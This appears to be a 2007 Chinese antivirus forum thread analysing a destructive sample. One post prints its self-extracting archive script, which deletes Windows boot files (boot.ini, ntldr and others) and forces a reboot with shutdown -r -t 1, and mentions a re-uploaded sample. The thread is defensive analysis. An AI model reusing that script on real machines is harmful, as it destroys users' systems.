楼主: xhtxht
收起左侧

[病毒样本] 发个病毒向准备英勇就义的卡饭们致敬!

[复制链接]
xhtxht
 楼主| 发表于 2007-1-18 20:45:02 | 显示全部楼层
楼上的楼上,我现在也能用微点杀出了,昨天我已经把这个程序发给微点的反病毒程序组了,能查出是他们今天更新的

[ 本帖最后由 xhtxht 于 2007-1-18 20:54 编辑 ]
timefielder
发表于 2007-1-18 21:34:29 | 显示全部楼层
晕,点击下载卡巴就报了,看截图

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
xhtxht
 楼主| 发表于 2007-1-18 21:38:24 | 显示全部楼层
也许咔吧是今天更新的,可能卡饭们报告的
hzq277284
头像被屏蔽
发表于 2007-1-19 11:03:25 | 显示全部楼层
22楼的恐怕凡是带密码且带有可执行文件的压缩包卡巴全都会这么警告,不见得已经加入病毒库
dikex
发表于 2007-1-19 13:42:40 | 显示全部楼层
纯粹的恶意程序一个!旨在破坏,不会进行传播!

运行后首先在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 创建 wextract_cleanup0 (由此推出这个东西是用wextract封装),值设为"rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\IXP000.TMP\"

在C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\IXP000.TMP\下面生成r.exe,这是个winrar自解压文件,图标是QQ的小企鹅,脚本为:
  1. Path=C:\
  2. Setup=OK.bat
  3. Silent=1
  4. Overwrite=1
  5. Delete=Autoexec.bat
  6. Delete=boot.ini
  7. Delete=bootfont.bin
  8. Delete=Config.sys
  9. Delete=Io.sys
  10. Delete=Msdos.sys
  11. Delete=Ntdetect.com
  12. Delete=ntldr
复制代码


也就是把ok.exe解压缩到C盘,然后把C盘根目录的启动文件(Autoexec.bat,boot.ini,bootfont.bin,Config.sys,Io.sys,Msdos.sys,Ntdetect.com,ntldr)全部删除,运行c:\ok.bat,内容为shutdown.exe -r -t 1 ,即立刻重启!

这样就导致了运行后立刻就系统重启,然后显示启动文件丢失
这时我们只要用系统光盘修复一下即可恢复,强烈BS一下弄这样纯粹破坏的恶意程序的人


把r.exe上传上来给大家,直接运行这个和运行原来的文件的效果一样
密码virus

[ 本帖最后由 dikex 于 2007-1-19 13:54 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +3 收起 理由
navigateqd + 3 版区有你更精彩: )

查看全部评分

minamoto
发表于 2007-1-19 15:19:27 | 显示全部楼层
2000虚拟机下运行,没有加入注册表,没有在临时文件夹内生成文件,只删除了c盘下的文件和生成 ok.bat 。因为2000没有shutdown.exe,所以也没有自动重起。

这算不上病毒,只是个恶意的程序而已。
flykiss
发表于 2007-1-20 14:39:16 | 显示全部楼层
微点不提示,电脑一秒后从起,进不了系统,只有用光盘引导进系统~~~
flykiss
发表于 2007-1-20 14:43:34 | 显示全部楼层
dikex (六翼刺猬)   用的什么监控啊?? 我的什么都没看到就从起了 ~~~~
野马
发表于 2007-1-20 15:23:41 | 显示全部楼层
盖茨 是否又要发布补丁了!
The EQs
发表于 2007-1-20 15:41:01 | 显示全部楼层
原帖由 hzq277284 于 2007-1-19 11:03 发表
22楼的恐怕凡是带密码且带有可执行文件的压缩包卡巴全都会这么警告,不见得已经加入病毒库

正解。。明眼人一看就是密码保护才报的。。。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 13:33 , Processed in 0.096527 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表